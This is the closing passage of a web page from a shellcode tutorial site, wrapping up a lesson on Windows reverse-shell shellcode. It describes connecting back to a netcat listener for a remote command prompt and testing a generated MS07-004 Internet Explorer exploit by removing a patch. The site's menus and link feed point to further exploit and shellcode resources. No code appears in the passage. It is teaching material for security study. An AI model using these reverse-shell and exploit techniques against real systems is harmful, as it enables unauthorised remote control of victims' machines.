&nbsp;&nbsp;&nbsp;&nbsp;Microsoft Windows XP [Version 5.1.2600]<br>
&nbsp;&nbsp;&nbsp;&nbsp;(C) Copyright 1985-2001 Microsoft Corp.<br>
&nbsp;&nbsp;&nbsp;&nbsp;<br>
&nbsp;&nbsp;&nbsp;&nbsp;C:\Documents and Settings\Administrator&gt;</p>
<p>If you see a Windows command prompt then you have succeeded.</p>
<p>If you havent then I have found that cygwin doesnt always seem to play happily with the <a href="http://www.projectshellcode.com/">shellcode</a> test program with <a href="http://www.projectshellcode.com/">shellcode</a>
 containing network connections. The latest version of the 
shellcode-compiler.sh script automatically generates a template exploit 
for the Internet Explorer vulnerability ms07-004 containing your <a href="http://www.projectshellcode.com/">shellcode</a>
 encoded with Unicode encoding. You can try this exploit on your own 
system by uninstalling the Windows XP Internet Explorer patch marked 
KB929969, then load up the template exploit in Internet Explorer.</p>
<p><strong><br>
Clean Up<br>
</strong></p>
<p>You should make sure that you kill any netcat listeners that you have
 setup on your machine.by either using the kill program in cygwin, or by
 using the Windows Task Manager.</p>
<p><strong><br>
Congratulations!<br>
</strong></p>
<p>You have just created <a href="http://www.projectshellcode.com/">shellcode</a>
 that loads ws2_32.dll, initializes networking, and then connects back 
to a backdoor listener, which is then redirected to a command prompt on 
the compromised box.</p>
  </div>
    
    
</div>
                      </div><!-- /content -->

      <div id="sidebar-wrapper">
        <div id="sidebar">
                    <div id="block-user-0" class="clear-block block block-user">

  <h2 class="title">User login</h2>

  <div class="content"><form action="/?q=node/24&amp;destination=node%2F24" accept-charset="UTF-8" method="post" id="user-login-form">
<div><div class="form-item" id="edit-name-wrapper">
 <label for="edit-name">Username: <span class="form-required" title="This field is required.">*</span></label>
 <input maxlength="60" name="name" id="edit-name" size="15" class="form-text required" type="text">
</div>
<div class="form-item" id="edit-pass-wrapper">
 <label for="edit-pass">Password: <span class="form-required" title="This field is required.">*</span></label>
 <input name="pass" id="edit-pass" maxlength="60" size="15" class="form-text required" type="password">
</div>
<input name="op" id="edit-submit" value="Log in" class="form-submit" type="submit">
<div class="item-list"><ul><li class="first"><a href="http://projectshellcode.com/?q=user/register" title="Create a new user account.">Create new account</a></li>
<li class="last"><a href="http://projectshellcode.com/?q=user/password" title="Request new password via e-mail.">Request new password</a></li>
</ul></div><input name="form_build_id" id="form-15213869fab4a802d5d8479da1fe2fdd" value="form-15213869fab4a802d5d8479da1fe2fdd" type="hidden">
<input name="form_id" id="edit-user-login-block" value="user_login_block" type="hidden">

</div></form>
</div>
</div>
<div id="block-menu-primary-links" class="clear-block block block-menu">

  <h2 class="title">Project Shellcode Menu</h2>

  <div class="content"><ul class="menu"><li class="leaf first"><a href="http://www.projectshellcode.com/forum/2" title="Discussions relating to shellcode tutorials, tools, help, debugging, development, resources, and new shellcode ideas.">Shellcode Forum</a></li>
<li class="expanded"><a href="http://www.projectshellcode.com/node/300" title="Training courses to teach you how to create different types of shellcode on various platforms.">Shellcode Training</a><ul class="menu"><li class="leaf first last"><a href="http://projectshellcode.com/?q=node/300" title="The Shellcode Lab - Black Hat Training Course">The Shellcode Lab</a></li>
</ul></li>
<li class="leaf"><a href="http://projectshellcode.com/?q=node/12" title="Tutorials on shellcode related concepts and techniques">Shellcode Tutorials</a></li>
<li class="expanded"><a href="http://projectshellcode.com/?q=node/5" title="Shellcode available to download">Shellcode Downloads</a><ul class="menu"><li class="leaf first"><a href="http://projectshellcode.com/?q=forum/3" title="Upload and share your shellcode with the rest of the Project Shellcode community. Supported file types: txt c asm rb sh">Shellcode Uploads</a></li>
<li class="leaf"><a href="http://projectshellcode.com/?q=node/5" title="Reverse DNS Tunneling Shellcode Download">Reverse DNS Tunneling Shellcode</a></li>
<li class="leaf"><a href="http://projectshellcode.com/aggregator/categories/4" title="Pulls together a bunch of publicly published ASM shellcode files for Linux.">Online Linux Shellcode</a></li>
<li class="leaf last"><a href="http://projectshellcode.com/aggregator/categories/5" title="">Online Windows Shellcode</a></li>
</ul></li>
<li class="expanded"><a href="http://projectshellcode.com/aggregator/categories/2" title="White papers discussing shellcode related concepts and techniques">Shellcode Whitepapers</a><ul class="menu"><li class="leaf first"><a href="http://projectshellcode.com/aggregator/categories/2" title="Pulls together a great list of published shellcode related whitepapers.">Online Shellcode Whitepapers</a></li>
<li class="collapsed last"><a href="http://projectshellcode.com/?q=node/10" title="White papers discussing shellcode related concepts and techniques">DNS Tunneling Shellcode Papers</a></li>
</ul></li>
<li class="expanded"><a href="http://www.projectshellcode.com/aggregator/sources/1" title="Links to external shellcode related concepts and techniques">Links</a><ul class="menu"><li class="leaf first"><a href="http://www.projectshellcode.com/?q=aggregator/sources/1" title="Pulls together shellcode related pages from various feeds and security sites.">Online Shellcode Feed</a></li>
<li class="leaf"><a href="http://projectshellcode.com/?q=node/7" title="Resources used during the research and development of Reverse DNS Tunneling Shellcode.">Reverse DNS Tunneling Shellcode Links</a></li>
<li class="leaf last"><a href="http://projectshellcode.com/?q=node/8" title="Shellcode resources brought together in the one place.">Shellcode Resource Links</a></li>
</ul></li>
<li class="leaf"><a href="http://projectshellcode.com/?q=node/9" title="Tools useful for shellcoding and related concepts">Tools</a></li>
<li class="leaf last"><a href="http://projectshellcode.com/?q=node/11" title="Presentations that have been done about various shellcode.">Presentations</a></li>
</ul></div>
</div>
<div id="block-search-0" class="clear-block block block-search">


  <div class="content"><form action="/?q=node/24" accept-charset="UTF-8" method="post" id="search-block-form">
<div><div class="container-inline">
  <div class="form-item" id="edit-search-block-form-1-wrapper">
 <label for="edit-search-block-form-1">Search this site: </label>
 <input maxlength="128" name="search_block_form" id="edit-search-block-form-1" size="15" title="Enter the terms you wish to search for." class="form-text" type="text">
</div>
<input name="op" id="edit-submit-1" value="Search" class="form-submit" type="submit">
<input name="form_build_id" id="form-4063d8350038f2d6ddc9c1421851b6d7" value="form-4063d8350038f2d6ddc9c1421851b6d7" type="hidden">
<input name="form_id" id="edit-search-block-form" value="search_block_form" type="hidden">
</div>

</div></form>
</div>
</div>
<div id="block-aggregator-feed-1" class="clear-block block block-aggregator">

  <h2 class="title">Shellcode Feed</h2>

  <div class="content"><div class="item-list"><ul><li class="first"><a href="http://www.scribd.com/doc/30556012/Libemu-and-extracting-shellcodes-from-PDF-malware">Libemu and extracting shellcodes from PDF malware</a>
</li>
<li><a href="http://www.shellcode.pl/">SUPERSITE.PL</a>
</li>
<li><a href="http://nepenthes.carnivore.it/csni:shellcodes:ravensburg">csni:shellcodes:ravensburg [Nepenthes - finest collection -]</a>
</li>
<li><a href="http://shellcode.org/">shellcode.org</a>
</li>
<li><a href="http://www.exploit-db.com/">Exploits Database by Offensive Security</a>
</li>
<li><a href="http://r00tsecurity.org/forums/topic/12739-shellcode-tutorial-4-message-box-shellcode/">Shellcode Tutorial 4: Message Box Shellcode - r00tsecurity</a>
</li>
<li><a href="http://www.corelan.be/index.php/tag/shellcode/">Shellcode | Corelan Team</a>
</li>
<li><a href="http://lpmagazine.org/article/8608-linux-shellcode-optimisation">Linux+ DVD :: Article</a>
</li>
<li><a href="http://packetstormsecurity.org/papers/shellcode/">Files Packet Storm</a>
</li>
<li><a href="http://www.blackhat.com/presentations/bh-usa-08/Chawdhary_Uppal/BH_US_08_Chawdhary_Uppal_Cisco_IOS_Shellcodes.pdf">Microsoft PowerPoint - New_Cisco_IOS_Exploitation_Techniques ...</a>
</li>
<li><a href="http://ghostintheshellcode.com/">Ghost in the Shellcode</a>
</li>
<li><a href="http://securityreason.com/exploitalert/1464">WinZIP &amp;lt;= 10.0.7245 (FileView ActiveX) Remote Buffer Overflow ...</a>
</li>
<li><a href="http://www.securitytube.net/Buffer-Overflow-Primer-Part-2-%28Writing-Exit-Shellcode%29-video.aspx">Buffer Overflow Primer Part 2 (Writing Exit Shellcode) Tutorial</a>
</li>
<li><a href="http://psjailbreaker.com/">PS JAILBREAKER - THE BEST SOLUTION FOR HOMEBREW</a>
</li>
<li><a href="http://www.ghostsinthestack.org/pdf/Les-shellcodes.pdf">Les shellcodes</a>
</li>
<li><a href="http://goodfellas.shellcode.com.ar/docz/asm/WritingSmallShellcode.pdf">NGS</a>
</li>
<li><a href="http://www.amenext.com/tutorials/advanced-shellcoding-techniques/">Advanced Shellcoding Techniques Tutorials</a>
</li>
<li><a href="http://rootbiez.blogspot.com/2010/07/reverse-shellcode-tutorials.html">Rootbiez, HD vuonchuoi, Phim HD, Chep phim HD, HD phim quan 3 ...</a>
</li>
<li><a href="http://skypher.com/wiki/index.php/Hacking/Shellcode/Egg_hunt/w32_SEH_omelet_shellcode">Hacking/Shellcode/Egg hunt/w32 SEH omelet shellcode - Skypher</a>
</li>
<li class="last"><a href="http://www.blackhat.com/presentations/bh-europe-09/Caillat/BlackHat-Europe-09-Caillat-Wishmaster-whitepaper.pdf">WiShMaster - WIndows SHellcode MASTERy</a>
</li>
</ul></div><div class="more-link"><a href="http://projectshellcode.com/?q=aggregator/sources/1" title="View this feed's recent news.">more</a></div></div>
</div>
        </div><!-- /sidebar -->
      </div><!-- /sidebar-wrapper -->
      
      <div id="footer">
        Project Shellcode - The Next-Generation of Shellcode Development              </div><!-- /footer -->
    </div><!-- /container -->
      
</body></html>